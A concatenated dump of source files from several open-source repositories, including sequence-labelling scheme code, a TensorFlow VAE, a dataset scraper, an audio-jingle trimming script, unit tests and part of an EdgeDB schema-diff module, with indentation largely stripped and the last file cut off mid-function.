allowed_prefix = Prefix.B | Prefix.I | Prefix.L | Prefix.O | Prefix.U
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY),
(Prefix.ANY, Prefix.U, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.B, Prefix.L, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.L, Tag.SAME)
}
end_patterns = {
(Prefix.U, Prefix.ANY, Tag.ANY),
(Prefix.L, Prefix.ANY, Tag.ANY)
}
class Tokens:
def __init__(self, tokens: List[str], scheme: Type[Token],
suffix: bool = False, delimiter: str = '-', sent_id: int = None):
self.outside_token = scheme('O', suffix=suffix, delimiter=delimiter)
self.tokens = [scheme(token, suffix=suffix, delimiter=delimiter) for token in tokens]
self.extended_tokens = self.tokens + [self.outside_token]
self.sent_id = sent_id
@property
def entities(self):
"""Extract entities from tokens.
Returns:
list: list of Entity.
Example:
>>> tokens = Tokens(['B-PER', 'I-PER', 'O', 'B-LOC'], IOB2)
>>> tokens.entities
            [(None, PER, 0, 2), (None, LOC, 3, 4)]
"""
i = 0
entities = []
prev = self.outside_token
while i < len(self.extended_tokens):
token = self.extended_tokens[i]
token.is_valid()
if token.is_start(prev):
end = self._forward(start=i + 1, prev=token)
if self._is_end(end):
entity = Entity(sent_id=self.sent_id, start=i, end=end, tag=token.tag)
entities.append(entity)
i = end
else:
i += 1
prev = self.extended_tokens[i - 1]
return entities
def _forward(self, start: int, prev: Token):
for i, token in enumerate(self.extended_tokens[start:], start):
if token.is_inside(prev):
prev = token
else:
return i
return len(self.tokens) - 1
def _is_end(self, i: int):
token = self.extended_tokens[i]
prev = self.extended_tokens[i - 1]
return token.is_end(prev)
class Entities:
def __init__(self, sequences: List[List[str]], scheme: Type[Token], suffix: bool = False, delimiter: str = '-'):
self.entities = [
Tokens(seq, scheme=scheme, suffix=suffix, delimiter=delimiter, sent_id=sent_id).entities
for sent_id, seq in enumerate(sequences)
]
def filter(self, tag_name: str):
entities = {entity for entity in chain(*self.entities) if entity.tag == tag_name}
return entities
@property
def unique_tags(self):
tags = {
entity.tag for entity in chain(*self.entities)
}
return tags
def auto_detect(sequences: List[List[str]], suffix: bool = False, delimiter: str = '-'):
"""Detects scheme automatically.
auto_detect supports the following schemes:
- IOB2
- IOE2
- IOBES
"""
prefixes = set()
error_message = 'This scheme is not supported: {}'
for tokens in sequences:
for token in tokens:
try:
token = Token(token, suffix=suffix, delimiter=delimiter)
prefixes.add(token.prefix)
except KeyError:
raise ValueError(error_message.format(token))
allowed_iob2_prefixes = [
{Prefix.I, Prefix.O, Prefix.B},
{Prefix.I, Prefix.B},
{Prefix.B, Prefix.O},
{Prefix.B}
]
allowed_ioe2_prefixes = [
{Prefix.I, Prefix.O, Prefix.E},
{Prefix.I, Prefix.E},
{Prefix.E, Prefix.O},
{Prefix.E}
]
allowed_iobes_prefixes = [
{Prefix.I, Prefix.O, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.O, Prefix.B, Prefix.E},
{Prefix.O, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.B, Prefix.E},
{Prefix.B, Prefix.E, Prefix.S},
{Prefix.O, Prefix.B, Prefix.E},
{Prefix.B, Prefix.E},
{Prefix.S}
]
allowed_bilou_prefixes = [
{Prefix.I, Prefix.O, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.O, Prefix.B, Prefix.L},
{Prefix.O, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.B, Prefix.L},
{Prefix.B, Prefix.L, Prefix.U},
{Prefix.O, Prefix.B, Prefix.L},
{Prefix.B, Prefix.L},
{Prefix.U}
]
if prefixes in allowed_iob2_prefixes:
return IOB2
elif prefixes in allowed_ioe2_prefixes:
return IOE2
elif prefixes in allowed_iobes_prefixes:
return IOBES
elif prefixes in allowed_bilou_prefixes:
return BILOU
else:
raise ValueError(error_message.format(prefixes))
``` |
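A minimal usage sketch for the scheme machinery above (IOB2 is the most common tagging scheme; the import path follows the file layout of the seqeval package):
```python
from seqeval.scheme import Entities, IOB2
sequences = [['B-PER', 'I-PER', 'O', 'B-LOC']]
entities = Entities(sequences, scheme=IOB2)
print(entities.entities[0])    # [(0, PER, 0, 2), (0, LOC, 3, 4)]
print(entities.filter('PER'))  # {(0, PER, 0, 2)}
print(entities.unique_tags)    # {'PER', 'LOC'} (set order is arbitrary)
```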
{
"source": "jrabary/generator-tf",
"score": 2
} |
#### File: _project/_data/inputs_test.py
```python
import tensorflow as tf
class InputsTest(tf.test.TestCase):
def test_inputs(self):
# Write your inputs unit test here
pass
``` |
{
"source": "jrabary/xae",
"score": 2
} |
#### File: jrabary/xae/vae_main.py
```python
import tensorflow as tf
import numpy as np
import PIL.Image as Image
from xae.data import celeba_dataset
from xae.models import celebs
from xae.models.dcgan_generator import DCGANGenerator
tfgan = tf.contrib.gan
ds = tf.contrib.distributions
slim = tf.contrib.slim
default_params = tf.contrib.training.HParams(
latent_space_dim=2,
observable_space_dims=[28, 28, 1],
learning_rate=1e-4,
)
celebs_params = tf.contrib.training.HParams(
generator={
'final_size': 32,
'depth': 64,
'num_outputs': 3
},
latent_space_dim=64,
observable_space_dims=[32, 32, 3],
learning_rate=1e-4,
batch_size=64,
train_data='/Users/jaonary/Data/celebA/img_align_celeba/*.jpg',
)
# def input_fn():
# dataset = (mnist_dataset.train('data/mnist')
# .repeat()
# .cache()
# .shuffle(buffer_size=50000)
# .batch(128)
# )
# (images, _) = dataset.make_one_shot_iterator().get_next()
#
# images = tf.reshape(images, [128, 28, 28, 1])
#
# return images, images
def model_fn(features, labels, mode, params):
is_training = mode == tf.estimator.ModeKeys.TRAIN
x = features
q_z_given_x = celebs.encode(x, params.latent_space_dim)
z_samples = q_z_given_x.sample()
generator = DCGANGenerator(z_samples, params.generator, is_training)
x_mean = tf.reshape(generator.mean, [params.batch_size] + params.observable_space_dims)
x_mean.set_shape([params.batch_size]+params.observable_space_dims)
reconstruction = tfgan.eval.image_reshaper(x_mean, num_cols=8)
tf.summary.image('reconstruction/x_mean', reconstruction)
# compute loss
# prior := p_z
prior = ds.MultivariateNormalDiag(loc=tf.zeros([1, params.latent_space_dim], dtype=tf.float32),
scale_diag=tf.ones([1, params.latent_space_dim], dtype=tf.float32))
# KL can be seen as regularization term!
KL = ds.kl_divergence(q_z_given_x, prior)
# The ELBO = reconstruction term + regularization term
reconstruction_loss = generator.reconstruction_loss(labels)
# tf.summary.scalar('reconstruction/loss', reconstruction_loss)
# elbo = tf.reduce_sum(tf.reduce_sum(log_prob,) - KL)
elbo = tf.reduce_sum(reconstruction_loss - KL)
loss = -elbo
optimizer = tf.train.AdamOptimizer(learning_rate=params.learning_rate)
train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op
)
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
config = tf.estimator.RunConfig(save_summary_steps=10)
estimator = tf.estimator.Estimator(model_fn=model_fn,
model_dir='celeba_training_2',
params=celebs_params,
config=config)
estimator.train(input_fn=lambda: celeba_dataset.image_file_inputs(celebs_params.train_data,
batch_size=celebs_params.batch_size,
patch_size=celebs_params.observable_space_dims[0]))
```
#### File: xae/data/celeba_dataset.py
```python
import tensorflow as tf
def close_crop(image, patch_size):
image.set_shape([None, None, 3])
width = 178
height = 218
new_width = 140
new_height = 140
left = (width - new_width) // 2
top = (height - new_height) // 2
right = (width + new_width) // 2
bottom = (height + new_height) // 2
image = tf.expand_dims(image, axis=0)
crops = tf.image.crop_to_bounding_box(image, top, left, bottom - top, right - left)
resize = tf.image.resize_images(crops, [patch_size, patch_size])
output = tf.squeeze(resize, axis=0)
output.set_shape([patch_size, patch_size, 3])
output = tf.to_float(output) / 255.
return output
def image_file_inputs(file_patters, batch_size=32, patch_size=32):
dataset = (tf.data.Dataset.list_files(file_patters)
.map(tf.read_file)
.map(tf.image.decode_image)
.map(lambda x: close_crop(x, patch_size))
.batch(batch_size))
data_iterator = dataset.make_one_shot_iterator()
images = data_iterator.get_next()
return images, images
```
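A hedged TensorFlow 1.x sketch of consuming the pipeline above; the glob pattern is a placeholder and at least `batch_size` matching JPEGs are assumed to exist:
```python
import tensorflow as tf
from xae.data import celeba_dataset
images, labels = celeba_dataset.image_file_inputs('/path/to/img_align_celeba/*.jpg',
                                                  batch_size=4, patch_size=32)
with tf.Session() as sess:
    batch = sess.run(images)
    print(batch.shape)  # (4, 32, 32, 3), values scaled to [0, 1]
```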
#### File: xae/models/celebs.py
```python
import tensorflow as tf
from math import log
from nets import dcgan
slim = tf.contrib.slim
ds = tf.contrib.distributions
def encode(x, latent_space_dim, is_training=True, scope='Encoder', fused_batch_norm=False):
normalizer_fn = slim.batch_norm
normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': fused_batch_norm,
}
depth = 128
inp_shape = x.get_shape().as_list()[1]
with tf.variable_scope(scope, values=[x]):
with slim.arg_scope([normalizer_fn], **normalizer_fn_args):
with slim.arg_scope([slim.conv2d],
stride=2,
kernel_size=4,
activation_fn=tf.nn.leaky_relu):
net = x
# for i in range(int(log(inp_shape, 2))):
for i in range(4):
scope = 'conv%i' % (i + 1)
current_depth = depth * 2 ** i
normalizer_fn_ = None if i == 0 else normalizer_fn
net = slim.conv2d(
net, current_depth, normalizer_fn=normalizer_fn_, scope=scope)
net = slim.flatten(net)
means = slim.fully_connected(net,
latent_space_dim,
normalizer_fn=None,
activation_fn=None)
log_sigmas = slim.fully_connected(net,
latent_space_dim,
normalizer_fn=None,
activation_fn=tf.nn.softplus)
q_z_given_x = ds.MultivariateNormalDiag(means, log_sigmas)
return q_z_given_x
def decode(inputs, final_size, depth=64, is_training=True, num_outputs=3, fused_batch_norm=False, scope='Generator'):
"""Use dcgan generator architecture as decoder"""
normalizer_fn = slim.batch_norm
normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': fused_batch_norm,
}
inputs.get_shape().assert_has_rank(2)
if log(final_size, 2) != int(log(final_size, 2)):
raise ValueError('`final_size` (%i) must be a power of 2.' % final_size)
if final_size < 8:
raise ValueError('`final_size` (%i) must be greater than 8.' % final_size)
end_points = {}
num_layers = int(log(final_size, 2)) - 1
with tf.variable_scope(scope, values=[inputs]):
with slim.arg_scope([normalizer_fn], **normalizer_fn_args):
with slim.arg_scope([slim.conv2d_transpose],
normalizer_fn=normalizer_fn,
stride=2,
kernel_size=4):
net = tf.expand_dims(tf.expand_dims(inputs, 1), 1)
# First upscaling is different because it takes the input vector.
current_depth = depth * 2 ** (num_layers - 1)
scope = 'deconv1'
net = slim.conv2d_transpose(
net, current_depth, stride=1, padding='VALID', scope=scope)
end_points[scope] = net
for i in range(2, num_layers):
scope = 'deconv%i' % (i)
current_depth = depth * 2 ** (num_layers - i)
net = slim.conv2d_transpose(net, current_depth, scope=scope)
end_points[scope] = net
# Last layer has different normalizer and activation.
scope = 'deconv%i' % (num_layers)
net = slim.conv2d_transpose(
net, depth, normalizer_fn=None, activation_fn=None, scope=scope)
end_points[scope] = net
# Convert to proper channels.
scope = 'means'
means = slim.conv2d(
net,
num_outputs,
normalizer_fn=None,
activation_fn=None,
kernel_size=1,
stride=1,
padding='VALID',
scope=scope)
end_points[scope] = means
means.get_shape().assert_has_rank(4)
means.get_shape().assert_is_compatible_with(
[None, final_size, final_size, num_outputs])
scope = 'log_sigmas'
log_sigmas = slim.conv2d(
net,
num_outputs,
normalizer_fn=None,
activation_fn=tf.nn.softplus,
kernel_size=1,
stride=1,
padding='VALID',
scope=scope)
end_points[scope] = log_sigmas
log_sigmas.get_shape().assert_has_rank(4)
log_sigmas.get_shape().assert_is_compatible_with(
[None, final_size, final_size, num_outputs])
p_x_given_z = ds.MultivariateNormalDiag(tf.reshape(means, [-1, final_size*final_size*num_outputs]),
tf.reshape(log_sigmas, [-1, final_size*final_size*num_outputs]))
return p_x_given_z
```
#### File: xae/models/encoder.py
```python
from abc import ABCMeta
from abc import abstractmethod
import tensorflow as tf
slim = tf.contrib.slim
class Encoder(object):
"""Abstract base class for probabilistic encoder model.
"""
__metaclass__ = ABCMeta
def __init__(self, obs_tensors, params, is_training):
self._scope = 'Encoder'
self._normalizer_fn = slim.batch_norm
self._normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': True,
}
self._q_z_given_x = self._compute_prob_z_given_x(obs_tensors, params)
@property
def q_z_given_x(self):
return self._q_z_given_x
@abstractmethod
def _compute_prob_z_given_x(self, obs_tensors, params):
pass
```
#### File: xae/models/mnist.py
```python
import tensorflow as tf
import numpy as np
ds = tf.contrib.distributions
def decode(z, observable_space_dims):
with tf.variable_scope('Decoder', [z]):
logits = tf.layers.dense(z, 200, activation=tf.nn.tanh)
logits = tf.layers.dense(logits, np.prod(observable_space_dims))
p_x_given_z = ds.Bernoulli(logits=logits)
return p_x_given_z
def encoder(x, observable_space_dim, latent_dim):
with tf.variable_scope('Encoder', [x]):
x = tf.reshape(x, [-1, np.prod(observable_space_dim)])
h = tf.layers.dense(x, 10, activation=tf.nn.tanh)
mu = tf.layers.dense(h, latent_dim)
sigma_sq = tf.layers.dense(h, latent_dim)
q_z_given_x = ds.MultivariateNormalDiag(mu, sigma_sq)
return q_z_given_x
``` |
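The encoder/decoder above compose into a standard VAE objective. Below is a hedged sketch (TensorFlow 1.x with `tf.contrib`, mirroring the style of `vae_main.py` earlier in this repo) of wiring them into the per-example ELBO; the placeholder shape and latent size are illustrative:
```python
import tensorflow as tf
from xae.models import mnist
ds = tf.contrib.distributions
x = tf.placeholder(tf.float32, [None, 28, 28, 1])
q_z_given_x = mnist.encoder(x, observable_space_dim=[28, 28, 1], latent_dim=2)
p_x_given_z = mnist.decode(q_z_given_x.sample(), observable_space_dims=[28, 28, 1])
prior = ds.MultivariateNormalDiag(loc=tf.zeros([1, 2]), scale_diag=tf.ones([1, 2]))
log_px = tf.reduce_sum(p_x_given_z.log_prob(tf.reshape(x, [-1, 28 * 28])), axis=-1)
elbo = log_px - ds.kl_divergence(q_z_given_x, prior)
loss = -tf.reduce_mean(elbo)  # minimize the negative ELBO, as in vae_main.py
```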
{
"source": "jrabasco/PyPasser",
"score": 3
} |
#### File: PyPasser/test/test_database.py
```python
__author__ = '<NAME>'
import sys
sys.path.append("..")
import unittest
from modules import database
from modules import service
class TestDatabase(unittest.TestCase):
def test_database_creation(self):
self.assertEqual(database.Database().name, "Database")
def test_custom_name(self):
db = database.Database()
db.name = "Custom"
self.assertEqual(db.name, "Custom")
def test_add_service(self):
test_service = service.Service()
db = database.Database()
db.add_service(test_service)
self.assertEqual(test_service.service_name, db.services[0].service_name)
self.assertEqual(test_service.username, db.services[0].username)
self.assertEqual(test_service.password, db.services[0].password)
def test_load(self):
db = database.Database()
dic = {
"name": "Hey",
"services": [service.Service()]
}
db.load(dic)
self.assertEqual("Hey", db.name)
self.assertEqual("ServiceName", db.services[0].service_name)
self.assertEqual("Username", db.services[0].username)
self.assertEqual("Password", db.services[0].password)
if __name__ == "__main__":
unittest.main()
```
#### File: PyPasser/test/test_storage.py
```python
__author__ = "<NAME>"
import sys
import os
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
def setUp(self):
self.service = Service()
self.database = Database()
open("test.service", "w+").close()
open("test.db", "w+").close()
def test_write_read_service(self):
self.service.service_name = "Hello"
self.service.username = "This"
self.service.password = "<PASSWORD>"
storage.write("test", self.service, "test.service")
service2 = Service()
storage.read("test", service2, "test.service")
self.assertEqual(service2.service_name, self.service.service_name)
self.assertEqual(service2.username, self.service.username)
self.assertEqual(service2.password, self.service.password)
def test_write_read_database(self):
self.database.add_service(Service())
self.database.add_service(Service())
self.database.name = "Hey"
storage.write("test", self.database, "test.db")
database2 = Database()
storage.read("test", database2, "test.db")
self.assertEqual(database2.name, self.database.name)
for i in range(len(self.database.services)):
self.assertEqual(database2.services[i].service_name, self.database.services[i].service_name)
self.assertEqual(database2.services[i].username, self.database.services[i].username)
self.assertEqual(database2.services[i].password, self.database.services[i].password)
def tearDown(self):
os.remove(os.getcwd() + "/test.service")
os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jrabinow/JJBoost",
"score": 3
} |
#### File: JJBoost/webscraper/dataset_downloader.py
```python
import urllib2
from BeautifulSoup import BeautifulSoup
import re
# max file size 23MB
maxFileSize = 1024*1024*23
def http_download(url):
try:
request = urllib2.urlopen(url)
data = request.read(maxFileSize)
# if file too large
if request.read(1) != '':
return None
else:
return data
except urllib2.HTTPError, e:
print("urllib2.HttpError")
exit()
except urllib2.URLError, e:
print("urllib2.URLError")
exit()
def extract_urls(baseurl):
response = http_download(baseurl)
soup = BeautifulSoup(response)
links = soup.findAll('a')[5:]
return links
def download_all(baseurl):
links = extract_urls(baseurl)
filenames = list()
for link in links:
url = baseurl + "/" + link.get("href")
print("Downloading " + url)
data = http_download(url)
if data == None:
print("Skipping (file too large)")
continue
data_file_name = url[url.rfind('/')+1:]
with open("./Datasets/" + data_file_name, "wb") as data_file:
data_file.write(data)
filenames.append(data_file_name)
return filenames
def main():
baseurl = "http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/"
download_all(baseurl)
if __name__ == "__main__":
main()
``` |
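The script above is written for Python 2 (`urllib2`, `except ... , e`, print statements). For reference, a rough Python 3 equivalent of the size-limited download using `urllib.request` could look like this sketch:
```python
import urllib.request
def http_download(url, max_size=1024 * 1024 * 23):
    with urllib.request.urlopen(url) as response:
        data = response.read(max_size)
        # If any byte remains, the file exceeds the limit and is skipped.
        return None if response.read(1) else data
```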
{
"source": "jraby/detect-audio-jingle",
"score": 2
} |
#### File: jraby/detect-audio-jingle/detect-audio-jingle.py
```python
import argparse
import glob
import librosa
import ffmpeg
import numpy as np
import os.path
import scipy.signal
import shutil
import warnings
from natsort import natsorted
max_longclip_duration = 4 * 60
def loadAudio(filename, sr=None):
y, sr = librosa.load(filename, duration=max_longclip_duration, mono=True, sr=sr)
return y, sr
def save_trimmed(in_file, out_file, seek):
if not seek:
shutil.copyfile(in_file, out_file)
return
ffmpeg.input(in_file, ss=seek).output(out_file, acodec="copy").overwrite_output().run()
def main():
warnings.filterwarnings('ignore', category=UserWarning, append=True)
parser = argparse.ArgumentParser()
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument("-d", "--input-dir", help="process all mp3s from this directory", action="store")
input_group.add_argument("-i", "--input-file", help="mp3 file to process", action="store")
parser.add_argument("-c", "--clip", help="mp3 clip to try and locate in input file(s)",
required=True)
parser.add_argument("--output-dir", help="Directory in which to save trimmed mp3s")
parser.add_argument("-n", "--dry-run", help="Dry-run", action="store_true")
parser.add_argument("--plots-dir", help="Directory in which to save a plot for each detection")
parser.add_argument("--fp-threshold-factor", default=16, type=int,
help="false positive threshold factor: max peak must be > [factor] * stddev + mean to trigger detection")
parser.add_argument("--percentile", help="First sample >= the percentile is considered 'peak'",
default=99.99, type=float) # determined by precise eye balling
args = parser.parse_args()
if not args.output_dir and not args.dry_run:
raise Exception("Needs --output-dir or --dry-run")
clip, clip_sr = loadAudio(args.clip)
# Cache of sample_rate -> reversed clip to be used by fftconvolve
clip_sr_cache = {clip_sr: clip[::-1]}
if args.input_file:
input_files = [args.input_file]
else:
input_files = natsorted(glob.glob(f"{args.input_dir}/*.mp3"))
for f in input_files:
base_f = os.path.basename(f)
if args.output_dir and not args.dry_run:
out_file = args.output_dir + '/' + base_f
if os.path.exists(out_file):
print(f"{f[:64]:64}: SKIPPED - output file already exists")
continue
f_samples, f_sr = loadAudio(f)
if f_sr not in clip_sr_cache:
# Resample clip to match current file and cache it (reversed) for future use
clip_sr_cache[f_sr] = librosa.core.resample(clip, clip_sr, f_sr)[::-1]
to_find = clip_sr_cache[f_sr]
# Find clip in input file using fftconvolve. Then approximate the start position of the clip.
# The 'peak' of the result is supposed to be the middle of the match, but it seems to be a
# little late according to precise by ear measurement.
# So instead of using the max value, this is using the first value that is in some high
# percentile (99.99).
z = scipy.signal.fftconvolve(f_samples, to_find, mode="same")
z = np.abs(z)
event_detection_threshold = np.percentile(z, args.percentile)
z_event_pos = np.argmax(z >= event_detection_threshold)
z_event_start = z_event_pos - len(to_find) // 2 # (peak assumed to be in middle of clip)
# But using percentiles leads to early detection, needs to floor to 0
z_event_start = z_event_start if z_event_start > 0 else 0
seek = z_event_start / f_sr
zmax = np.max(z)
zstd = np.std(z)
zmean = np.mean(z)
fp_max_threshold = zstd * args.fp_threshold_factor + zmean
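        # Detection rule: the correlation peak must stand well above the noise
        # floor (mean + fp_threshold_factor * std), and matches inside the first
        # 10 s are discarded so the file is copied untrimmed in that case.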
keep = zmax > fp_max_threshold and seek > 10
if not keep:
seek = 0
print((f"{f[:64]:64}: {'KEEP' if keep else 'NOPE'} {f_sr}hz "
f"{event_detection_threshold=:0.2f} {fp_max_threshold=:0.2f} "
f"{zmax=:0.2f} {zstd=:0.2f} {zmean=:0.2f} {z_event_start=} "
f"seek:{seek:0.2f}s"))
if args.plots_dir:
import matplotlib.pyplot as plt
os.makedirs(args.plots_dir, exist_ok=True)
x_min = 0
x_max = z_event_start + 5*f_sr
if x_max > len(z):
x_max = len(z)
plt.plot(z[x_min:x_max])
plt.xlabel("Sample number")
plt.title(base_f)
plt.savefig(f"{args.plots_dir}/{os.path.basename(f)}.png")
plt.clf()
if args.output_dir and not args.dry_run:
os.makedirs(args.output_dir, exist_ok=True)
out_file = args.output_dir + '/' + base_f
save_trimmed(in_file=f, out_file=out_file, seek=seek)
if __name__ == '__main__':
main()
``` |
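The detection above boils down to cross-correlating the recording with the time-reversed clip via `fftconvolve`. A self-contained sketch of that idea on synthetic audio (no files; the sample rate and durations are arbitrary):
```python
import numpy as np
import scipy.signal
rng = np.random.default_rng(0)
sr = 8000
clip = rng.normal(0, 1, size=sr // 2)        # 0.5 s noise-like "jingle"
signal = rng.normal(0, 0.1, size=10 * sr)    # 10 s of quiet background
start = 3 * sr
signal[start:start + clip.size] += clip      # embed the jingle at t = 3 s
z = np.abs(scipy.signal.fftconvolve(signal, clip[::-1], mode='same'))
est_start = np.argmax(z) - clip.size // 2    # peak sits near the clip centre
print(est_start / sr)                        # ~3.0 s
```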
{
"source": "jraby/pyes",
"score": 2
} |
#### File: pyes/tests/test_warmers.py
```python
from __future__ import absolute_import
from pyes.tests import ESTestCase
import pyes
class WarmerTestCase(ESTestCase):
def setUp(self):
super(WarmerTestCase, self).setUp()
self.conn.indices.create_index(self.index_name)
self.conn.indices.refresh(self.index_name)
def test_put_get_warmer(self):
warmer1 = pyes.Search(pyes.MatchAllQuery())
#ES fails if the index is empty
self.conn.index({'a':1}, self.index_name, self.document_type)
self.conn.indices.refresh(self.index_name)
self.conn.put_warmer(indices=[self.index_name], name='w1', warmer=warmer1)
result = self.conn.get_warmer(indices=[self.index_name], name='w1')
expected = {
self.index_name: {
'warmers': {
'w1': {
'source': {
'query': {'match_all': {}}
},
'types': []
}
}
}
}
self.assertEqual(result, expected)
def test_delete_warmer(self):
warmer1 = pyes.Search(pyes.MatchAllQuery())
self.conn.put_warmer(indices=[self.index_name], name='w1', warmer=warmer1)
self.conn.delete_warmer(indices=[self.index_name], name='w1')
self.assertRaises(
pyes.exceptions.ElasticSearchException,
self.conn.get_warmer,
indices=[self.index_name],
name='w1'
)
if __name__ == "__main__":
import unittest
unittest.main()
``` |
{
"source": "jracabado/edgedb",
"score": 2
} |
#### File: edb/schema/delta.py
```python
from __future__ import annotations
from typing import *
import collections
import collections.abc
import contextlib
import functools
import itertools
import uuid
from edb import errors
from edb.common import adapter
from edb.common import checked
from edb.common import markup
from edb.common import ordered
from edb.common import parsing
from edb.common import struct
from edb.common import topological
from edb.common import typing_inspect
from edb.common import verutils
from edb.edgeql import ast as qlast
from edb.edgeql import compiler as qlcompiler
from edb.edgeql import qltypes
from edb.edgeql import quote as qlquote
from . import expr as s_expr
from . import name as sn
from . import objects as so
from . import schema as s_schema
from . import utils
def delta_objects(
old: Iterable[so.Object_T],
new: Iterable[so.Object_T],
sclass: Type[so.Object_T],
*,
parent_confidence: Optional[float] = None,
context: so.ComparisonContext,
old_schema: s_schema.Schema,
new_schema: s_schema.Schema,
) -> DeltaRoot:
delta = DeltaRoot()
oldkeys = {o: o.hash_criteria(old_schema) for o in old}
newkeys = {o: o.hash_criteria(new_schema) for o in new}
unchanged = set(oldkeys.values()) & set(newkeys.values())
old = ordered.OrderedSet[so.Object_T](
o for o, checksum in oldkeys.items()
if checksum not in unchanged
)
new = ordered.OrderedSet[so.Object_T](
o for o, checksum in newkeys.items()
if checksum not in unchanged
)
oldnames = {o.get_name(old_schema) for o in old}
newnames = {o.get_name(new_schema) for o in new}
common_names = oldnames & newnames
pairs = sorted(
itertools.product(new, old),
key=lambda pair: pair[0].get_name(new_schema) not in common_names,
)
full_matrix: List[Tuple[so.Object_T, so.Object_T, float]] = []
# If there are any renames that are already decided on, honor those first
renames_x: Set[sn.Name] = set()
renames_y: Set[sn.Name] = set()
for y in old:
rename = context.renames.get((type(y), y.get_name(old_schema)))
if rename:
renames_x.add(rename.new_name)
renames_y.add(rename.classname)
if context.guidance is not None:
guidance = context.guidance
def can_create(name: sn.Name) -> bool:
return (sclass, name) not in guidance.banned_creations
def can_alter(old_name: sn.Name, new_name: sn.Name) -> bool:
return (sclass, (old_name, new_name)) not in guidance.banned_alters
def can_delete(name: sn.Name) -> bool:
return (sclass, name) not in guidance.banned_deletions
else:
def can_create(name: sn.Name) -> bool:
return True
def can_alter(old_name: sn.Name, new_name: sn.Name) -> bool:
return True
def can_delete(name: sn.Name) -> bool:
return True
for x, y in pairs:
x_name = x.get_name(new_schema)
y_name = y.get_name(old_schema)
if can_alter(y_name, x_name):
similarity = y.compare(
x,
our_schema=old_schema,
their_schema=new_schema,
context=context,
)
else:
similarity = 0.0
full_matrix.append((x, y, similarity))
full_matrix.sort(
key=lambda v: (
1.0 - v[2],
str(v[0].get_name(new_schema)),
str(v[1].get_name(old_schema)),
),
)
full_matrix_x = {}
full_matrix_y = {}
seen_x = set()
seen_y = set()
x_alter_variants: Dict[so.Object_T, int] = collections.defaultdict(int)
y_alter_variants: Dict[so.Object_T, int] = collections.defaultdict(int)
comparison_map: Dict[so.Object_T, Tuple[float, so.Object_T]] = {}
comparison_map_y: Dict[so.Object_T, Tuple[float, so.Object_T]] = {}
# Find the top similarity pairs
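    # full_matrix is sorted by descending similarity (ties broken by name), so a
    # single greedy pass pairs each new object with its best still-unclaimed match.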
for x, y, similarity in full_matrix:
if x not in seen_x and y not in seen_y:
comparison_map[x] = (similarity, y)
comparison_map_y[y] = (similarity, x)
seen_x.add(x)
seen_y.add(y)
if x not in full_matrix_x:
full_matrix_x[x] = (similarity, y)
if y not in full_matrix_y:
full_matrix_y[y] = (similarity, x)
if (
can_alter(y.get_name(old_schema), x.get_name(new_schema))
and full_matrix_x[x][0] != 1.0
and full_matrix_y[y][0] != 1.0
):
x_alter_variants[x] += 1
y_alter_variants[y] += 1
alters = []
if comparison_map:
if issubclass(sclass, so.InheritingObject):
# Generate the diff from the top of the inheritance
# hierarchy, since changes to parent objects may inform
# how the delta in child objects is treated.
order_x = cast(
Iterable[so.Object_T],
_sort_by_inheritance(
new_schema,
cast(Iterable[so.InheritingObject], comparison_map),
),
)
else:
order_x = comparison_map
for x in order_x:
s, y = comparison_map[x]
x_name = x.get_name(new_schema)
y_name = y.get_name(old_schema)
already_has = x_name == y_name and x_name not in renames_x
if (
0.6 < s < 1.0
or (
(not can_create(x_name) or not can_delete(y_name))
and can_alter(y_name, x_name)
)
or x_name in renames_x
):
if (
(x_alter_variants[x] > 1 or (
not already_has and can_create(x_name)))
and parent_confidence != 1.0
):
confidence = s
else:
# TODO: investigate how parent confidence should be
# correlated with child confidence in cases of explicit
# nested ALTER.
confidence = 1.0
alter = y.as_alter_delta(
other=x,
context=context,
self_schema=old_schema,
other_schema=new_schema,
confidence=confidence,
)
alter.set_annotation('confidence', confidence)
alters.append(alter)
created = new - {x for x, (s, _) in comparison_map.items() if s > 0.6}
for x in created:
x_name = x.get_name(new_schema)
if can_create(x_name) and x_name not in renames_x:
create = x.as_create_delta(schema=new_schema, context=context)
if x_alter_variants[x] > 0 and parent_confidence != 1.0:
confidence = full_matrix_x[x][0]
else:
confidence = 1.0
create.set_annotation('confidence', confidence)
delta.add(create)
delta.update(alters)
deleted_order: Iterable[so.Object_T]
deleted = old - {y for _, (s, y) in comparison_map.items() if s > 0.6}
if issubclass(sclass, so.InheritingObject):
deleted_order = _sort_by_inheritance( # type: ignore
old_schema,
cast(Iterable[so.InheritingObject], deleted),
)
else:
deleted_order = deleted
for y in deleted_order:
y_name = y.get_name(old_schema)
if can_delete(y_name) and y_name not in renames_y:
delete = y.as_delete_delta(schema=old_schema, context=context)
if y_alter_variants[y] > 0 and parent_confidence != 1.0:
confidence = full_matrix_y[y][0]
else:
confidence = 1.0
delete.set_annotation('confidence', confidence)
delta.add(delete)
return delta
def _sort_by_inheritance(
schema: s_schema.Schema,
objs: Iterable[so.InheritingObjectT],
) -> Iterable[so.InheritingObjectT]:
graph = {}
for x in objs:
graph[x] = topological.DepGraphEntry(
item=x,
deps=ordered.OrderedSet(x.get_bases(schema).objects(schema)),
extra=False,
)
return topological.sort(graph, allow_unresolved=True)
def sort_by_cross_refs(
schema: s_schema.Schema,
objs: Iterable[so.Object_T],
) -> Tuple[so.Object_T, ...]:
